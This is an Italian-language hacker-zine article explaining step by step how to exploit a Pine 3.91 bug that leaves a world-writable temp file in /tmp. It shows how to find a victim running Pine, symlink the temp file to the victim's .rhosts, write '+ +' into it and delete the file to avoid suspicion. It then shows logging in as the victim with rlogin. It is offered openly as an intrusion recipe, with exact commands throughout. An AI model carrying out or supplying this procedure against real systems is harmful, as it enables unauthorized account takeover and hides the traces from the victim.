Copy Link
Add to Bookmark
Report
Vana Imago 1 22
PINE 3.91 BUG di Techno Knight Vi spiego come exploitare un bug, quello del Pine 3.91, che poi stato fixato nella versione 3.95. La versione buggata lascia un logfile temporaneo con mode 666 (la bestia) nella directory /tmp. Questo file quindi presente ogni volta che c' Pine in esecuzione ed presente nuova posta in INBOX. Dunque per prima cosa vediamo chi sta eseguendo pine, con "ps -aux | grep pine". Mettiamo che abbiate trovato che l'user bossi stia eseguendo pine, allora dovrete trovare il file temporaneo con "ls -al /tmp/ | grep bossi" (-a perch il file comincia con un punto, l perch ci serve anche la descri- zione per vedere di che user e "| grep bossi" per vedere solo i files che contengono nel nome o nella descrizione la stringa "bossi"). Poi bisogna aspettare che bossi chiuda pine, e allora potremo fare un link simbolico al nome del file che abbiamo trovato ("ln -s /home/bossi/.rhost /tmp/nomedelfiletemp") In questo modo quando bossi eseguir
di nuovo pine, noi potremo accedere al suo .rhost tramite il file temporaneo (echo "+ +" > /tmp/nomedelfiletemp) e poi cancellarlo per non far sorgere sospetti (rm /tmp/nomedelfiletemp). Ecco, ora possiamo entrare nel suo account tramite rlogin (rlogin leganord.pa -l bossi). Techno Knight(techno83@freemail.it) 
